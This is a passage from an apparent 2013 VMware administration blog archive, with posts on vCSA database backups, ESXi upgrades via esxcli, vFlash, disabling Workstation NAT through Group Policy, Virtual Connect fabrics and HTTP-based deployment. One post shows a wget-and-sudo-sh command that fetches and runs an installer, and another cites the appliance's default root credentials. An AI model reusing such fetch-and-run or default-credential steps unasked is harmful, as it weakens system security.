Both values come from /etc/vmware-vpx/embedded_db.cfg. Off it goes, and creates a dump file in /tmp. So far so good, we have a database dump, but how do we automate it? Add a new file in /etc/cron.daily/ (or use /etc/cron.hourly/ if that fits your RPO better) called vcdbbackup.sh with the following content:

#!/bin/sh
/opt/vmware/vpostgres/1.0/bin/pg_dump VCDB -U vc -Fp -c > /tmp/VCDBBackupFile

Then we need to make the cron script executable by running:

chmod u+x /etc/cron.daily/vcdbbackup.sh

And you should be ready to go! Of course, you should probably create the backup files somewhere other than /tmp, and even mount a file share from another server in your environment and place the dump file there for safekeeping and further backup in your existing scheme. In addition to this, you can add other variables to the script, like datestamping the file, but for now this is what I have done. By doing backups of the vCSA in this manner, you can have a standby vCSA lying around in case of a primary vCSA failure. If that happens, fire up the standby one, SSH to it and restore the vPostgres dump. I won't go into details on that right now, but the command for restoring looks like this:

PGPASSWORD=EMB_DB_PASSWORD ./psql -d EMB_DB_INSTANCE -Upostgres -f VCDBBackupFile

Feature Request # What VMware should do for the next version of the vCSA is to add external Microsoft SQL Server support, but if that's off the table for some reason, at least let us manage database dumps via the vCSA admin interface? Please create pre-defined scripts and crontabs, and let us manage those. It might not be as good as external database support when it comes to backup, but a little goes a long way in protecting this valuable resource in your infrastructure.
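The datestamping mentioned above can be sketched like this. This is an illustrative variant of the cron script, not from the original post; the backup directory and the retention count of 7 dumps are arbitrary examples, and the script is guarded so it is a no-op on machines without vPostgres:

```shell
#!/bin/sh
# Date-stamped variant of /etc/cron.daily/vcdbbackup.sh (sketch).
# Database name (VCDB) and user (vc) come from /etc/vmware-vpx/embedded_db.cfg.
BACKUP_DIR=/tmp   # better: a mounted file share, as suggested above
PG_DUMP=/opt/vmware/vpostgres/1.0/bin/pg_dump

# backup_name: build a file name like VCDBBackup-20131001-0400.sql
backup_name() {
  echo "VCDBBackup-$(date +%Y%m%d-%H%M).sql"
}

# Only run the dump where the vPostgres binary actually exists.
if [ -x "$PG_DUMP" ]; then
  "$PG_DUMP" VCDB -U vc -Fp -c > "$BACKUP_DIR/$(backup_name)"
  # Simple retention: keep the 7 newest dumps (relies on ls -t ordering
  # and on the date-stamped names never colliding within a minute).
  ls -1t "$BACKUP_DIR"/VCDBBackup-*.sql 2>/dev/null | tail -n +8 | xargs rm -f
fi
```

With hourly cron and this naming scheme, each run produces a uniquely named dump, so a bad dump no longer overwrites the only copy.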
References # Backing up and restoring the vCenter Server Appliance (vPostgres) database (2034505) --- # Upgrading vSphere vCenter Appliance 5.1 to 5.5 URL: https://vNinja.net/vmware-2/upgrading-vsphere-vcenter-appliance-5-1-5-5/ Date: 2013-09-30 Author: christian Tags: Appliance, Upgrade, vCenter, VCSA, vSphere, vSphere 5.5 In VMware KB Upgrading vCenter Server Appliance 5.0.x/5.1 to 5.5 (2058441) the procedure for upgrading an existing 5.0/5.1 vSphere vCenter Server Appliance is outlined, walking you through the steps required, including deploying a new 5.5 vCSA and transferring the data from the old instance to the new one. A straightforward procedure, but there is one small caveat in this process. One important thing to remember, and something I don't feel the knowledge base article highlights well enough, is that the new v5.5 appliance should not be configured in any way when deployed. In my opinion there should be a new step between steps 1 and 2 in the KB article, detailing that the default blank values should not be changed at all. When using the "Deploy OVF" wizard in the Web Client or Desktop Client, you get asked for network details like IP, subnet, gateway and hostname. In order for the new appliance to successfully import your old data and take over the old appliance details like hostname, IP address and so forth, all these values should be left blank while importing to ensure a successful upgrade. If you do this, the upgrade succeeds as anticipated, and the old vCenter Server Appliance is powered down and the new one takes over. --- # Can you combine vSphere Host Cache and vFlash on a single SSD? URL: https://vNinja.net/vmware-2/combine-vsphere-host-cache-vflash-single-ssd/ Date: 2013-09-30 Author: christian Tags: 5.5, ESXi, featured, Host Cache, vCenter, vFlash, Virtualization, VMware, vSphere One of the new features in vSphere 5.5 is the vSphere vFlash that enables you to use an SSD/Flash device as a read cache for your storage.
Duncan Epping has a series of posts on vSphere Flash Cache that is well worth a read. vSphere vFlash caches your read IOs, but at the same time you can use it as a swap device if you run into memory contention issues. The vSphere vFlash Host Cache is similar to the older Host Cache feature, but if you are upgrading from an older version of ESXi there are a couple of things that need to be done to be able to use this feature. If you had the "old" Host Cache enabled before upgrading to v5.5, you have to delete the dedicated Host Cache datastore and re-create a new vSphere vFlash resource to be able to use both vFlash Host Cache and vSphere Flash Read Cache on the same SSD/Flash device. Also note that vFlash Read Cache is only available for VMs that run in ESXi 5.5 Compatibility Mode, aka Virtual Hardware Version 10, and is enabled per VMDK in the VM's settings. Now you can utilize vFlash to both accelerate your read IOs, and speed up your host if you run into swapping issues. Good deal! --- # VMware vCenter Server Appliance Error: VPXD must be stopped to perform this operation URL: https://vNinja.net/vmware-2/vmware-vcenter-server-appliance-error-vpxd-stopped-perform-operation/ Date: 2013-09-29 Author: christian Tags: 5.5, ESXi, vCenter, vCenter Server Appliance, VMware, vSphere While deploying a fresh vCenter Server 5.5 Appliance, I ran into an issue getting it configured. When the appliance is deployed, the first time you log in you get presented with the configuration wizard. The wizard clearly states that if you want to set a static IP or hostname, you should cancel the wizard, do the network configuration and then re-run the wizard after the fact. Well, that's what I did, and it resulted in the following error when trying to create the embedded database:

VC_CFG_RESULT=410(Error: VPXD must be stopped to perform this operation.)

I even tried redeploying the appliance from scratch, but sadly that had the same outcome.
In the end, I was able to complete the configuration by opening an SSH session to the vCenter appliance, and running the following command to stop the vmware-vpxd service mentioned in the error message:

~ # service vmware-vpxd stop

After that I could successfully complete the Setup Wizard. Hopefully this will help someone finding themselves in the same conundrum in the future. Update # Since my setup is a single host, and at the moment of deploying the vCenter Server Appliance there was no existing vCenter in place, I deployed the appliance directly to an ESXi host. When you do this, you do not get the OVF deployment wizard that asks for your IP addresses, netmasks etc. I suspect that this is the root cause of this issue, and that this is something you can/will run into if you deploy it in this manner. --- # Quick and Dirty ESXi 5.5 Upgrade URL: https://vNinja.net/virtualization/quick-dirty-esxi-5-5-upgrade/ Date: 2013-09-23 Author: christian Tags: 5.5, Command Line, esxcli, ESXi, Host, Upgrade, VIB, VMware, vSphere As I've posted about earlier, you can update your ESXi hosts to a new release from the command line. Now that ESXi 5.5 has been released, the same procedure can be applied to upgrade once more. Place the host in maintenance mode, then run the following command to do an online update to ESXi 5.5:

~ # esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-5.5.0-1331820-standard

While this runs, monitor the log file to check the upgrade progress:

~ # tail -f /var/log/esxupdate.log

Let it run all the way until it's finished, reboot the host and hey presto, fresh new ESXi 5.5 upgrade completed! Quick and dirty, just the way we like it.
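The whole quick-and-dirty sequence can be sketched as one small script. This is illustrative only, not part of the original procedure: the profile name is the 5.5 GA example from above, the maintenance-mode step uses vim-cmd, the reboot check keys off the "Reboot Required: true" line esxcli prints on success, and the guard makes the whole thing a no-op anywhere esxcli is absent:

```shell
# Quick-and-dirty upgrade in one go (sketch; run over SSH on the ESXi host).
DEPOT=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
PROFILE=ESXi-5.5.0-1331820-standard

# needs_reboot: true when the esxcli update result contains "Reboot Required: true".
needs_reboot() {
  printf '%s\n' "$1" | grep -q "Reboot Required: true"
}

if command -v esxcli >/dev/null 2>&1; then
  vim-cmd hostsvc/maintenance_mode_enter   # put the host in maintenance mode first
  RESULT="$(esxcli software profile update -d "$DEPOT" -p "$PROFILE")"
  printf '%s\n' "$RESULT"
  if needs_reboot "$RESULT"; then
    reboot
  fi
fi
```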
To verify the version, still using the command line, issue the following command:

~ # vmware -l
VMware ESXi 5.5.0 GA

Of course, test this thoroughly before doing this in a production environment, after all your hosts might need VIBs not included in the standard download. Update 16.02.2015 # To find out which patches to apply, and what the correct profile name would be, check out the VMware ESXi Patch Tracker by Andreas Peetz. It's a great resource to keep track of patches for your ESXi hosts. --- # Podcasting for Cancer URL: https://vNinja.net/virtualization/podcasting-cancer/ Date: 2013-09-14 Author: christian Tags: Awesome, Cancer, Community, Fundraising Sometimes all it takes is one single tweet to set things in motion: Just a year after losing Dad to cancer, Mom's has now spread from lung to other areas. Too soon for this shit. — Gabriel Chapman (@Bacon_Is_King) September 12, 2013 This started a spiral of tweets, discussions and ideas being thrown around, and has now resulted in Podcasting for Cancer. The current goal is to raise $5000 USD by November 12th - let's absolutely crush that goal! --- # vSphere 5.5 Availability and VSAN Public Beta URL: https://vNinja.net/vmware-2/vsphere-5-5-availability-vsan-public-beta/ Date: 2013-09-12 Author: christian Tags: Speculation, VMware, VSAN, vSphere, vSphere 5.5 As Eric Siebert has pointed out, the VMware vSphere release cycles are shortening. While vSphere 5.1 could be seen as a bit rushed when it was released, especially in regards to SSO, the shorter release cycles seem to work out pretty well. This does make me think though; vSphere 5.5 is pretty much ready to be released to the general public, and the new VSAN component will be in a public beta at the same time. Does this indicate that VMware might actually be moving to a more modular approach, with different release cycles for different components?
I can see how this works for "add-on" products like Horizon View, VDP and so on, but for "core" components like a new local storage layer this is a new one. Is this a new modular approach, or is it due to the fact that the release cycle this time around was too short to get VSAN included? Or, perhaps it is as simple as Jason A Linden just suggested on Twitter; VSAN will be included in vSphere 5.5 Update 1? --- # Veeam Webinar & NFR Licenses URL: https://vNinja.net/virtualization/veeam-webinar-nfr-licenses/ Date: 2013-09-05 Author: christian Tags: Backup & Replication v7, NFR, Veeam, vSphere, Webinar This coming Tuesday the first ever Veeam webinar held in Norwegian will be presented by yours truly. Feel free to sign up now and listen to me speak for an hour or so. Also, Veeam is continuing its support of the virtualization community and is yet again offering free 180-day Veeam Backup Management Suite v7 NFR licenses for VMware and Hyper-V. Note that this offer is only available to anyone who is one of the following: VMware vExpert, VMware Certified Professional (VCP), Microsoft Certified Professional (MCP), Microsoft Certified Technology Specialist (MCTS) or Most Valuable Professional (MVP) --- # My Slate Setup URL: https://vNinja.net/osx/slate-setup/ Date: 2013-07-31 Author: christian Tags: KeyRemap4MacBook, Customization, OS X, PCKeyboardHack, Setup, Slate, Software, Window Manager About a year and a half ago, I took the leap from running Microsoft Windows as my main operating system and switched into full "hipster mode", i.e. switched to a MacBook Air and OS X. Simply put, "the change" was not that hard and most everything has worked without problems, and for those things that still require Microsoft Windows, well, there is VMware Fusion for that. While I'm admittedly still a novice OS X user, and not even close to mastering OS X, I'd like to share my current Slate setup.
Slate is an OS X window manager that makes it much easier to resize, focus and arrange your applications. The real beauty of it is that everything is controlled via the keyboard, no need to reach for the mouse. By combining PCKeyboardHack and KeyRemap4MacBook with Slate, I am now able to move my windows to pre-arranged locations on my display, or even "throw" a window to another monitor if required. None of this was originally my idea, I've stolen quite a bit from Using Slate: A Hacker's Window Manager for Macs and other sources, but the end result is simply a dream to work with. As suggested in A useful Caps Lock key, I have remapped my Caps Lock key to F19, and set F19 up as a Hyper key (Control, Command, Option and Shift pressed simultaneously), and use that as a trigger in Slate. One thing I always forget to do, though, is to disable the Caps Lock key whenever I connect a new keyboard to the Mac. After a recent re-install I could not for the life of me figure out why this setup was not working, until I remembered that I had to disable the key (as mentioned in the article linked to above). The first thing you'll need to do is disable the Caps Lock key in OS X. Head to System Preferences' Keyboard pane and click the "Modifier Keys…" button. Set Caps Lock to "No Action." My current .slate config file looks like this: Seasoned Slate users will notice that I am barely scratching the surface of what is possible here, but this is a work in progress. I really want to set up pre-defined application locations and window sizes based on my various multi-monitor setups (MacBook only, home office, work office, etc.), but that is still a work in progress. How fun is it being able to hit caps-lock right-arrow and throw an application window from the internal MacBook screen to a secondary screen on my right? And at the same time resize it to fill the entire screen! It may just be me, but I do find pleasure in these little things. Especially when they just work.
Now I just have to remember to use them frequently; muscle memory is a powerful tool when it comes to efficiency. --- # Monitoring the ESXi Upgrade Process URL: https://vNinja.net/vmware-2/monitoring-esxi-upgrade-process/ Date: 2013-06-26 Author: christian Tags: ESXi, Log, Maintenance, Ops, Real World, Upgrade, Virtualization, VMware, vSphere When doing manual host upgrades, either through the direct method or via a locally placed upgrade bundle, there is a distinct lack of progress information available after running the esxcli command. Thankfully the ESXi host provides a running logfile of the upgrade process, which makes it much easier to keep track of what is going on and to confirm that the upgrade is indeed being performed. The esxupdate.log is located in /var/log, and by issuing the following command in a terminal window you can have a rolling log showing you the upgrade status and progress:

~ # tail -f /var/log/esxupdate.log

By running the following command in one terminal window (this uses the VMware offline bundle to upgrade from ESXi 5.1 to 5.1 Update 1):

~ # esxcli software vib update -d /vmfs/volumes/[lunID]/update-from-esxi5.1-5.1_update01.zip

you get output like this in the secondary terminal window where the log file is being monitored:

2013-06-26T10:24:51Z esxupdate: HostImage: INFO: Attempting to download VIB tools-light
2013-06-26T10:25:07Z esxupdate: vmware.runcommand: INFO: runcommand called with: args = '/sbin/backup.sh 0 /altbootbank', outfile = 'None', returnoutput = 'True', timeout = '0.0'.
2013-06-26T10:25:08Z esxupdate: BootBankInstaller.pyc: INFO: boot config of '/altbootbank' is being updated, 5
2013-06-26T10:25:08Z esxupdate: HostImage: DEBUG: Host is remediated by installer: locker, boot
2013-06-26T10:25:08Z esxupdate: root: DEBUG: Finished execution of command = vib.install
2013-06-26T10:25:08Z esxupdate: root: DEBUG: Completed esxcli output, going to exit esxcli-software

That sure beats waiting "blindly" for an upgrade/installation to finish, and in many ways this is also much better than a nonsensical progress bar. --- # Centrally Disable NAT in VMware Workstation URL: https://vNinja.net/vmware-2/centrally-disable-nat-vmware-workstation/ Date: 2013-06-25 Author: christian Tags: GPMC, Group Policy, Group Policy Preferences, management, VMware, VMware Workstation, Windows, Workstation A fellow IT professional, who works with the non-wired flavor of networking, contacted me with the following scenario: A group of users, developers in this case, have VMware Workstation installed on their laptops. This makes it easy for them to manage, test and develop their applications in a closed environment without having to install a bunch of tools/services on their centrally managed laptop environment. An excellent use case for VMware Workstation if there ever was one. So far, so good. The problem in this particular case was that due to security policies in the network infrastructure there was a need to disable the NAT networking possibilities in VMware Workstation. Network address translation (NAT) configures your virtual machine to share the IP and MAC addresses of the host. The virtual machine and the host share a single network identity that is not visible outside the network. NAT can be useful when you are allowed a single IP address or MAC address by your network administrator. You might also use NAT to configure separate virtual machines for handling http and ftp requests, with both virtual machines running off the same IP address or domain.
See Network Address Translation (NAT). Since the VM shares the host MAC address and IP, blocking network access from the VM is not trivial in this scenario. Thankfully, in VMware Workstation for Windows, NAT is provided through a Windows Service that we can manipulate. By disabling the "VMware NAT Service" we can ensure that NAT does not work, and that the only real alternative is to run the VM in "Bridged Mode". Bridged Mode makes it easier for network admins to manipulate access, since the virtual network adapter is exposed to the switches with its own MAC address, and thus possibly also its own IP address, and the VM is not "hidden" behind the host's MAC. For instance, this makes it possible for the network gurus to limit the VM's physical network access to internet access only, without exposing the internal network to the VM. Running around disabling the "VMware NAT Service" on all clients that run VMware Workstation is no fun job, so naturally we need to find a way to automate this as well. Enter Group Policy Preferences # On a computer that has VMware Workstation installed, run the Group Policy Management Console and create a new GPO. In Computer Configuration > Preferences > Control Panel Settings select Services. In the menu click on Action > New > Service and click on "…" next to the Service Name field. Select the "VMware NAT Service" and click "Select". Set the Startup mode to "disabled". Assign this new Group Policy Preference to the OU that the clients with VMware Workstation installed reside in, and the next time the policies are refreshed, the "VMware NAT Service" should be set to disabled. Note: This might require a reboot of the client. Profit. And there it is, a workaround on how to disable the possibility for VMs running in VMware Workstation to utilize NAT mode. A bit of a hack, but it works.
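For a single client, the same thing can be done by hand before the GPO refresh lands. A sketch, with assumptions worth checking: it expects an elevated prompt on the Workstation host, it assumes the sc.exe service name matches the "VMware NAT Service" display name shown in services.msc (verify with sc.exe query), and the guard makes it a no-op on non-Windows machines:

```shell
# One-off manual equivalent of the Group Policy Preference above.
# nat_stopped: true when `sc.exe query` output reports the service as stopped.
nat_stopped() {
  printf '%s\n' "$1" | grep -q "STOPPED"
}

if command -v sc.exe >/dev/null 2>&1; then
  sc.exe stop "VMware NAT Service"
  sc.exe config "VMware NAT Service" start= disabled
  if nat_stopped "$(sc.exe query "VMware NAT Service")"; then
    echo "NAT service disabled."
  fi
fi
```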
Wishlist # I really wish VMware would include the possibility to configure and manage multiple VMware Workstation for Windows installs through Group Policy and Group Policy Preferences. The ability to centrally manage configurations and settings would be a welcome addition to this already excellent piece of software, and I am sure that I am not alone in asking for this possibility. So how about it VMware, yay or nay? --- # Virtual Connect FlexFabric and Direct-Attach FC 3Par Caveat URL: https://vNinja.net/storage-2/virtual-connect-flexfabric-direct-attach-fc-3par-caveat/ Date: 2013-05-30 Author: christian Tags: 3Par, BladeSystem, Bug, Fibre Channel, HP, SFP+, storage, StoreServ, Virtual Connect When configuring a new C7000 Blade Enclosure with a couple of FlexFabric 10Gb/24-port modules, I ran into a rather annoying issue during setup. HP Virtual Connect 3.70 introduced support for Direct-Attach setups of HP 3Par StoreServ 7000 storage systems, where you can eliminate the need for dedicated FC switches. For full details, have a look at Implementing HP Virtual Connect Direct-Attach Fibre Channel with HP 3PAR StoreServ Systems. This is excellent for setups where all your hosts are HP Blades, and you have a Virtual Connect FlexFabric setup. After all, fewer components means less complexity, right? The problem I ran into is a bit strange though, and it took some time figuring out what was wrong. The HP 3Par StoreServ 7200 was racked, stacked and configured when the FC SFP+ modules were installed in the FlexFabric module, and I pretty much thought it would be plug and play from there to get the blades to talk FC to the HP 3Par after going through the Virtual Connect setup. Sadly, that was not the case. It seems there is a bug in the web GUI for VC 3.70 that prevents getting a working setup. I know 3.75 is released, but nothing in the release notes seems to indicate that this has been fixed in that release.
For some reason, the "Fabric Type" dropdown where you should be able to select either "FabricAttach" or "DirectAttach" is greyed out, thus preventing the proper configuration of the SAN Fabric in "DirectAttach" mode. It defaults to "FabricAttach", and in a Direct-Attach scenario that simply does not work. You will not be able to get an FC link and the SFP+ module will be listed as "unsupported". The solution was to create the SAN Fabric manually by using the Virtual Connect CLI interface. The following commands created the two fabrics required for redundancy (VC module in Bay 1 and in Bay 2):

add fabric Fabric-1-3PAR Bay=1 Ports=1 Type=DirectAttach
add fabric Fabric-2-3PAR Bay=2 Ports=1 Type=DirectAttach

As you can see, by using the add fabric command it was possible to define the correct Fabric Type, and I could then proceed to add Port 2 from Bay 2 to Fabric-1-3PAR and vice versa to create a fully redundant setup. --- # Quick and Dirty HTTP Based Deployment URL: https://vNinja.net/virtualization/quick-and-dirty-http-based-deployment/ Date: 2013-05-14 Author: christian Tags: automation, Deployment, fun, http, Python, realworld, vMA, VMware, vSphere A lot of the scripted installation tools that VMware offers allow the use of a central HTTP-based repository for hosting the files. Today I stumbled over a little gem that might just help you create a "quick and dirty" HTTP-based deployment scenario by running a simple command in your terminal. By default, this command works on any system that has Python installed on it, so OS X and Linux should be ready to go as is. As for you Windows users out there, well, your mileage may vary. The trick here is a one-line Python command that simply creates an HTTP server listing the files in your current directory over a given port. On my MacBook, I opened Terminal and ran the following command:

python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ..
If I then open my browser, and point it to the IP address of my MacBook, I get a directory listing showing the contents of the current directory. As you can see, the directory contains a few files, namely a Damn Small Linux appliance packaged as an OVA, as well as the Linux installation files for ovftool. In this particular case, I wanted to install ovftool inside a running vMA instance I had in my infrastructure. By downloading the files into a given directory on my MacBook and serving them via HTTP from there, I could pull ovftool straight into the running vMA instance. Running the following command (output edited for verbosity):

vi-admin@record:> wget http://192.168.5.62:8000/VMware-ovftool-3.0.1-801290-lin.x86_64.bundle && sudo sh VMware-ovftool-3.0.1-801290-lin.x86_64.bundle
100%[======================================>] 36,631,447 1.46M/s in 23s
2013-05-14 12:13:06 (1.52 MB/s) - `VMware-ovftool-3.0.1-801290-lin.x86_64.bundle.saved [36631447/36631447]
...
vi-admin's password:
Extracting VMware Installer...done.
...
Do you agree? [yes/no]: yes
...
Installing VMware OVF Tool component for Linux 3.0.1
Configuring...
[######################################################################] 100%
Installation was successful.
vi-admin@record:/tmp>

I was able to download and install ovftool in one command. The same deployment method could also easily be used to install host patches, deploy OVF-based appliances and even install VIB files from a central repository. In fact, that's the next thing to do here: deploy the Damn Small Linux appliance using the newly installed ovftool package. The flexibility of having a small HTTP server available by running a single command is great, and I'm sure there are many other use cases that I have yet to consider.
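The SimpleHTTPServer one-liner above is Python 2; on Python 3 the module moved to http.server, but the trick is unchanged. A quick sketch with a self-check, assuming python3 and curl are on the PATH (the port number 8123 is an arbitrary example):

```shell
# Serve the current directory over HTTP with Python 3, then fetch the listing.
PORT=8123
python3 -m http.server "$PORT" >/dev/null 2>&1 &
SERVER_PID=$!
sleep 1                                  # give the server a moment to bind
curl -s "http://127.0.0.1:$PORT/" > /tmp/listing.html
kill "$SERVER_PID"
```

The fetched page is the same auto-generated directory index you would see in the browser, so this doubles as a quick check that the repository is reachable before pointing an installer at it.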
--- # Quick and Dirty ESXi 5.1U1 Upgrade URL: https://vNinja.net/vmware-2/quick-dirty-esxi-5-1u1-upgrade/ Date: 2013-04-26 Author: christian Tags: Command Line, ESXi, Host, Upgrade, VMware Now that VMware ESXi 5.1 Update 1 has been released, I decided to do a quick and dirty upgrade of my home installation. I refuse to call it a lab these days, since it's one singular host and all it does is contain my home domain controller… Anyway, the following procedure upgraded the host from 5.1b to 5.1U1, by downloading the upgrade directly from VMware and installing it. Make sure the host is in maintenance mode before attempting this procedure. Check Correlating vCenter Server and ESXi/ESX host build numbers to update levels (1014508) to determine which of the update files in the repository to download. SSH into your host, and issue the following command:

~ # esxcli software profile update -d https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml -p ESXi-5.1.0-20130402001-standard

This will initiate a download of the new ESXi version and install the update automatically; beware that it will not show any progress bar or indication while the file is being downloaded from the VMware repository. The command above will only work, as Erik pointed out in the comments, if you have allowed the httpClient outgoing access on the ESXi server. If not, you can enable it by running the following command on the host (or by using the vSphere Client):

~ # esxcli network firewall ruleset set -e true -r httpClient

You can of course monitor your download with the vSphere Client (web or otherwise), to make sure nothing has stopped. You can also monitor the upgrade process by looking at the VMware logs, as Paul suggested in the comments: Monitoring the ESXi Upgrade Process. Once it's done, it will look like this:

Update Result
Message: The update completed successfully, but the system needs to be rebooted for the changes to be effective.
Reboot Required: true VIBs Installed: VMware_bootbank_esx-base_5.1.0-1.12.1065491, VMware_bootbank_esx-xserver_5.1.0-0.11.1063671, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.510.1.12.1065491, VMware_bootbank_misc-drivers_5.1.0-1.12.1065491, VMware_bootbank_net-bnx2_2.0.15g.v50.11-7vmw.510.1.12.1065491, VMware_bootbank_net-bnx2x_1.61.15.v50.3-1vmw.510.0.11.1063671, VMware_bootbank_net-e1000e_1.1.2-3vmw.510.1.12.1065491, VMware_bootbank_net-igb_2.1.11.1-3vmw.510.1.12.1065491, VMware_bootbank_net-ixgbe_3.7.13.6iov-10vmw.510.1.12.1065491, VMware_bootbank_net-tg3_3.123b.v50.1-1vmw.510.1.12.1065491, VMware_bootbank_scsi-megaraid-sas_5.34-4vmw.510.1.12.1065491, VMware_locker_tools-light_5.1.0-1.12.1065491 VIBs Removed: VMware_bootbank_esx-base_5.1.0-0.10.1021289, VMware_bootbank_esx-xserver_5.1.0-0.0.799733, VMware_bootbank_ipmi-ipmi-si-drv_39.1-4vmw.510.0.0.799733, VMware_bootbank_misc-drivers_5.1.0-0.0.799733, VMware_bootbank_net-bnx2_2.0.15g.v50.11-7vmw.510.0.0.799733, VMware_bootbank_net-bnx2x_1.61.15.v50.3-1vmw.510.0.0.799733, VMware_bootbank_net-e1000e_1.1.2-3vmw.510.0.0.799733, VMware_bootbank_net-igb_2.1.11.1-3vmw.510.0.0.799733, VMware_bootbank_net-ixgbe_3.7.13.6iov-10vmw.510.0.0.799733, VMware_bootbank_net-tg3_3.110h.v50.4-4vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-sas_5.34-4vmw.510.0.0.799733, VMware_locker_tools-light_5.1.0-0.9.914609 VIBs Skipped: VMware_bootbank_ata-pata-amd_0.3.10-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-atiixp_0.4.6-4vmw.510.0.0.799733, VMware_bootbank_ata-pata-cmd64x_0.2.5-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-hpt3x2n_0.3.4-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-pdc2027x_1.0-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-serverworks_0.4.3-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-sil680_0.4.8-3vmw.510.0.0.799733, VMware_bootbank_ata-pata-via_0.3.3-2vmw.510.0.0.799733, VMware_bootbank_block-cciss_3.6.14-10vmw.510.0.0.799733, VMware_bootbank_ehci-ehci-hcd_1.0-3vmw.510.0.0.799733, 
VMware_bootbank_esx-dvfilter-generic-fastpath_5.1.0-0.0.799733, VMware_bootbank_esx-tboot_5.1.0-0.0.799733, VMware_bootbank_esx-xlibs_5.1.0-0.0.799733, VMware_bootbank_ima-qla4xxx_2.01.31-1vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-devintf_39.1-4vmw.510.0.0.799733, VMware_bootbank_ipmi-ipmi-msghandler_39.1-4vmw.510.0.0.799733, VMware_bootbank_misc-cnic-register_1.1-1vmw.510.0.0.799733, VMware_bootbank_net-be2net_4.1.255.11-1vmw.510.0.0.799733, VMware_bootbank_net-cnic_1.10.2j.v50.7-3vmw.510.0.0.799733, VMware_bootbank_net-e1000_8.0.3.1-2vmw.510.0.0.799733, VMware_bootbank_net-enic_1.4.2.15a-1vmw.510.0.0.799733, VMware_bootbank_net-forcedeth_0.61-2vmw.510.0.0.799733, VMware_bootbank_net-nx-nic_4.0.558-3vmw.510.0.0.799733, VMware_bootbank_net-r8168_8.013.00-3vmw.510.0.0.799733, VMware_bootbank_net-r8169_6.011.00-2vmw.510.0.0.799733, VMware_bootbank_net-s2io_2.1.4.13427-3vmw.510.0.0.799733, VMware_bootbank_net-sky2_1.20-2vmw.510.0.0.799733, VMware_bootbank_net-vmxnet3_1.1.3.0-3vmw.510.0.0.799733, VMware_bootbank_ohci-usb-ohci_1.0-3vmw.510.0.0.799733, VMware_bootbank_sata-ahci_3.0-13vmw.510.0.0.799733, VMware_bootbank_sata-ata-piix_2.12-6vmw.510.0.0.799733, VMware_bootbank_sata-sata-nv_3.5-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-promise_2.12-3vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil24_1.1-1vmw.510.0.0.799733, VMware_bootbank_sata-sata-sil_2.3-4vmw.510.0.0.799733, VMware_bootbank_sata-sata-svw_2.3-3vmw.510.0.0.799733, VMware_bootbank_scsi-aacraid_1.1.5.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-adp94xx_1.0.8.12-6vmw.510.0.0.799733, VMware_bootbank_scsi-aic79xx_3.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-bnx2i_1.9.1d.v50.1-5vmw.510.0.0.799733, VMware_bootbank_scsi-fnic_1.5.0.3-1vmw.510.0.0.799733, VMware_bootbank_scsi-hpsa_5.0.0-21vmw.510.0.0.799733, VMware_bootbank_scsi-ips_7.12.05-4vmw.510.0.0.799733, VMware_bootbank_scsi-lpfc820_8.2.3.1-127vmw.510.0.0.799733, VMware_bootbank_scsi-megaraid-mbox_2.20.5.1-6vmw.510.0.0.799733, 
VMware_bootbank_scsi-megaraid2_2.00.4-9vmw.510.0.0.799733, VMware_bootbank_scsi-mpt2sas_10.00.00.00-5vmw.510.0.0.799733, VMware_bootbank_scsi-mptsas_4.23.01.00-6vmw.510.0.0.799733, VMware_bootbank_scsi-mptspi_4.23.01.00-6vmw.510.0.0.799733, VMware_bootbank_scsi-qla2xxx_902.k1.1-9vmw.510.0.0.799733, VMware_bootbank_scsi-qla4xxx_5.01.03.2-4vmw.510.0.0.799733, VMware_bootbank_scsi-rste_2.0.2.0088-1vmw.510.0.0.799733, VMware_bootbank_uhci-usb-uhci_1.0-3vmw.510.0.0.799733 ~ #

Reboot your host, and behold the glory of the new ESXi 5.1 Update 1 version! If you want to know how to find the correct URL and file, check out William Lam's excellent A Pretty Cool Method of Upgrading to ESXi 5.1 post, which provides more details. I told you it was quick and dirty, didn't I?

--- # Adding a secondary NIC to the vCenter 5.1 Appliance (VCSA) URL: https://vNinja.net/virtualization/adding-secondary-nic-vcenter-5-1-appliance-vcsa/ Date: 2013-04-25 Author: christian Tags: ESXi, Hack, Networking, vCenter, VCSA, Virtualization, vSphere

While building my lab environment, I ran into a situation where I wanted to have a completely sealed-off networking segment with no outside access. This is a trivial task on its own: just create a vSwitch with no physical NICs attached to it, and then connect the VMs to it. The VMs will then have interconnectivity, but no outside network access at all. In this particular case, I was setting up a couple of nested ESXi servers that I wanted to connect to the "outside" vCenter Appliance (VCSA). This VCSA instance was not connected to the internal-only vSwitch, but rather to the existing vSwitch that has local network access. Naturally, the solution would be to add a secondary NIC to the VCSA, and connect that to the internal-only vSwitch. It turns out that adding a secondary NIC to a VCSA instance isn't as straightforward as you might think.
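As an aside, the internal-only vSwitch itself can also be created from the ESXi shell instead of the vSphere Client; a minimal sketch, assuming ESXi 5.x (the vSwitch and portgroup names here are made up for illustration):

```
~ # esxcli network vswitch standard add --vswitch-name=vSwitch-Internal
~ # esxcli network vswitch standard portgroup add --portgroup-name=Internal-Only --vswitch-name=vSwitch-Internal
```

Since no uplinks are ever attached to vSwitch-Internal, anything connected to the Internal-Only portgroup stays sealed off from the physical network.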
Sure, adding a new NIC is no problem through either the vSphere Client or the vSphere Web Client, but getting the NIC configured inside of the VCSA is another matter. If you add a secondary NIC, it will turn up in the VCSA management web page, but you will not be able to save the configuration since the required configuration files for eth1 are missing. In order to rectify this, I performed the following steps:

1. Connect to the VCSA via SSH (default username and password is root/vmware)
2. Copy /etc/sysconfig/networking/devices/ifcfg-eth0 to /etc/sysconfig/networking/devices/ifcfg-eth1
